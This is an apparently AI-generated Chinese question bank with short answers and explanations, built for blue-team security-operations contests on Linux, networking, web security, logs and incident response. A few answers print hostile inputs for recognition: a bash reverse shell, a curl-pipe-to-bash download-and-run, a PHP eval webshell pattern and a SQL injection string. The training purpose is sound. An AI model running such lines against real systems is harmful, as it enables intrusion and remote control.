选择题第一版本（ai生成）

网络安全运维比赛核心选择题题库（含答案与解释）

适用于：

• 网络安全运维赛
• 蓝盾比赛
• 应急响应
• Linux 运维
• Web 安全
• 安全基础理论

特点：

• 只保留核心知识点
• 只给正确答案
• 附带简短解释
• 适合断网速查
• 新手友好

---

Linux 基础

1. Linux 查看当前目录命令是？

答案：pwd

解释：print working directory，显示当前所在路径。

---

2. Linux 查看文件内容命令是？

答案：cat

解释：直接输出文件内容。

---

3. Linux 查看隐藏文件参数是？

答案：ls -a

解释：-a 表示显示隐藏文件。

---

4. Linux 返回上一级目录命令是？

答案：cd ..

解释：.. 表示上一层目录。

---

5. Linux 查看所有进程命令是？

答案：ps aux

解释：查看当前系统所有运行进程。

---

6. Linux 查看端口监听命令是？

答案：netstat -tunlp

解释：查看当前监听端口与对应程序。

---

7. Linux 强制结束进程命令是？

答案：kill -9 PID

解释：-9 表示强制终止进程。

---

8. Linux 查找文件命令是？

答案：find

解释：用于全盘搜索文件。

---

9. Linux 搜索关键字命令是？

答案：grep

解释：用于搜索文本内容。

---

10. Linux root 用户 UID 通常是多少？

答案：0

解释：UID=0 代表超级管理员。

---

11. Linux 用户信息默认保存在？

答案：/etc/passwd

解释：保存系统用户信息。

---

12. Linux 密码信息默认保存在？

答案：/etc/shadow

解释：保存加密密码。

---

13. chmod 777 的含义是？

答案：所有人可读写执行

解释：权限非常危险。

---

14. Linux 查看当前登录用户命令是？

答案：who

解释：显示当前在线用户。

---

15. Linux 查看历史登录记录命令是？

答案：last

解释：查看历史登录情况。

---

网络基础

16. HTTP 默认端口是？

答案：80

解释：Web 网站默认端口。

---

17. HTTPS 默认端口是？

答案：443

解释：加密 Web 服务端口。

---

18. SSH 默认端口是？

答案：22

解释：远程登录服务端口。

---

19. MySQL 默认端口是？

答案：3306

解释：MySQL 数据库默认端口。

---

20. Windows RDP 默认端口是？

答案：3389

解释：远程桌面服务端口。

---

21. DNS 默认端口是？

答案：53

解释：域名解析服务。

---

22. FTP 默认端口是？

答案：21

解释：文件传输协议端口。

---

23. TCP 属于哪一层协议？

答案：传输层

解释：负责可靠数据传输。

---

24. IP 协议属于哪一层？

答案：网络层

解释：负责数据寻址与路由。

---

25. ping 命令主要用于？

答案：测试网络连通性

解释：通过 ICMP 检测目标是否可达。

---

Web 安全

26. SQL 注入主要攻击目标是？

答案：数据库

解释：通过恶意 SQL 操作数据库。

---

27. XSS 攻击主要针对？

答案：浏览器

解释：执行恶意脚本。

---

28. CSRF 攻击本质是？

答案：伪造用户请求

解释：利用用户身份执行操作。

---

29. 文件上传漏洞可能导致？

答案：WebShell

解释：上传恶意脚本获取权限。

---

30. 以下哪个函数最危险？

答案：eval

解释：可执行任意代码。

---

31. base64_decode 常用于？

答案：木马混淆

解释：隐藏恶意代码。

---

32. PHP 一句话木马典型特征是？

答案：eval($_POST[])

解释：执行 POST 参数中的代码。

---

33. WebShell 本质上属于？

答案：后门程序

解释：攻击者远程控制网站。

---

34. union select 常见于哪类攻击？

答案：SQL 注入

解释：联合查询获取数据。

---

35. sleep(5) 常用于？

答案：时间盲注

解释：通过延时判断注入是否成功。

---

日志分析

36. Ubuntu 登录日志通常位于？

答案：/var/log/auth.log

解释：记录 SSH 与登录信息。

---

37. CentOS 登录日志通常位于？

答案：/var/log/secure

解释：记录系统登录情况。

---

38. Nginx 访问日志通常是？

答案：access.log

解释：记录网站访问请求。

---

39. error.log 主要记录？

答案：程序错误信息

解释：用于排查异常。

---

40. 日志分析核心目的是？

答案：发现攻击痕迹

解释：定位异常行为。

---

41. 大量 Failed password 通常意味着？

答案：爆破攻击

解释：攻击者尝试密码登录。

---

42. POST /shell.php 可能表示？

答案：WebShell 操作

解释：攻击者访问木马文件。

---

43. access.log 中访问量极高 IP 可能代表？

答案：恶意扫描或攻击

解释：频繁请求异常。

---

SSH 与账户安全

44. SSH 公钥默认保存在？

答案：~/.ssh/authorized_keys

解释：保存允许登录的公钥。

---

45. SSH 服务进程通常叫？

答案：sshd

解释：SSH 守护进程。

---

46. 弱口令最容易导致？

答案：账号被爆破

解释：密码容易被猜测。

---

47. root 远程登录风险是？

答案：权限过高

解释：一旦泄露后果严重。

---

48. Linux 修改密码命令是？

答案：passwd

解释：修改当前用户密码。

---

WebShell 与后门

49. 以下哪种最像反弹 Shell？

答案：bash -i >& /dev/tcp/ip/port 0>&1

解释：向攻击者回连。

---

50. 攻击者常用哪种方式维持权限？

答案：定时任务

解释：自动恢复木马。

---

51. crontab 的主要作用是？

答案：定时执行任务

解释：Linux 定时任务系统。

---

52. curl xx | bash 的风险是？

答案：远程下载执行恶意代码

解释：常见木马方式。

---

53. WebShell 查杀重点关注？

答案：最近修改文件

解释：木马通常近期上传。

---

54. find /var/www/html -mtime -1 的作用是？

答案：查最近一天修改文件

解释：用于发现异常文件。

---

Windows 安全

55. Windows 查看用户命令是？

答案：net user

解释：查看系统账户。

---

56. Windows 查看端口命令是？

答案：netstat -ano

解释：查看监听端口。

---

57. Windows 查看计划任务命令是？

答案：schtasks

解释：查看定时任务。

---

58. Windows 查看进程命令是？

答案：tasklist

解释：查看当前运行程序。

---

59. 注册表 Run 项主要用于？

答案：开机自启动

解释：恶意程序常驻位置。

---

60. PowerShell 常被攻击者利用原因是？

答案：可执行系统命令

解释：功能强大。

---

应急响应

61. 应急响应第一步通常是？

答案：发现异常

解释：先确认问题存在。

---

62. 应急响应核心目标是？

答案：恢复业务与排除风险

解释：保证系统正常运行。

---

63. 发现恶意进程后通常先？

答案：kill 进程

解释：阻止继续危害。

---

64. 应急响应中最重要的数据来源是？

答案：日志

解释：日志记录攻击行为。

---

65. 隔离主机主要目的是？

答案：防止攻击扩散

解释：避免进一步入侵。

---

工具与安全运维

66. Wireshark 主要用于？

答案：网络抓包分析

解释：查看网络流量。

---

67. Burp Suite 常用于？

答案：Web 安全测试

解释：分析 HTTP 请求。

---

68. nmap 主要用于？

答案：端口扫描

解释：发现开放服务。

---

69. sqlmap 主要用于？

答案：SQL 注入测试

解释：自动化注入工具。

---

70. hashcat 常用于？

答案：密码破解

解释：高性能跑 hash。

---

数据库与服务

71. nginx 属于？

答案：Web 服务器

解释：用于网站服务。

---

72. mysql 属于？

答案：数据库服务

解释：用于存储数据。

---

73. redis 未授权风险是？

答案：远程写入后门

解释：攻击者可控制服务器。

---

74. Apache 属于？

答案：Web 服务器

解释：提供网站服务。

---

75. systemctl 的主要作用是？

答案：管理系统服务

解释：启动停止服务。

---

密码学与安全基础

76. MD5 属于？

答案：哈希算法

解释：用于摘要计算。

---

77. SHA256 相比 MD5 更？

答案：更安全

解释：碰撞难度更高。

---

78. HTTPS 的核心安全机制是？

答案：TLS 加密

解释：保证传输安全。

---

79. 对称加密特点是？

答案：加解密使用同一密钥

解释：速度快。

---

80. 非对称加密特点是？

答案：公钥私钥分离

解释：适合身份认证。

---

比赛常识

81. 比赛中最危险操作是？

答案：rm -rf

解释：容易误删系统。

---

82. 比赛优先目标通常是？

答案：保证业务正常

解释：网站不能崩。

---

83. 比赛中新手最容易漏掉的是？

答案：定时任务后门

解释：木马会自动恢复。

---

84. 比赛里最重要的能力是？

答案：日志分析

解释：蓝队核心技能。

---

85. 发现木马后正确做法是？

答案：先分析再删除

解释：避免误删业务文件。

---

86. 比赛中网站打不开最可能导致？

答案：扣分

解释：业务中断。

---

87. 发现高危端口后优先操作是？

答案：确认对应进程

解释：避免误杀正常服务。

---

88. Linux 查看 PID 对应程序常用？

答案：ps aux

解释：查看进程详情。

---

89. Linux 查看某端口对应进程常用？

答案：lsof -i:端口

解释：查看端口归属。

---

90. 比赛中新手最应该优先做的是？

答案：基础题

解释：基础分最稳定。

---

高频攻击特征

91. 以下哪个最像 SQL 注入 payload？

答案：' or 1=1 --

解释：绕过登录验证。

---

92. cmd=whoami 常见于？

答案：命令执行漏洞

解释：远程执行系统命令。

---

93. 上传 shell.php 最可能代表？

答案：WebShell 上传

解释：攻击者获取控制权。

---

94. 大量 404 请求可能说明？

答案：目录扫描

解释：攻击者寻找路径。

---

95. User-Agent 异常可能说明？

答案：扫描器或脚本攻击

解释：自动化工具特征。

---

额外核心知识点

96. 防火墙主要作用是？

答案：控制网络访问

解释：过滤网络流量。

---

97. 最小权限原则指的是？

答案：只给予必要权限

解释：降低安全风险。

---

98. 数据备份最重要作用是？

答案：灾难恢复

解释：防止数据丢失。

---

99. 漏洞修复核心目标是？

答案：消除安全风险

解释：防止再次被攻击。

---

100. 蓝队工作的核心是？

答案：防御与响应

解释：保护系统安全。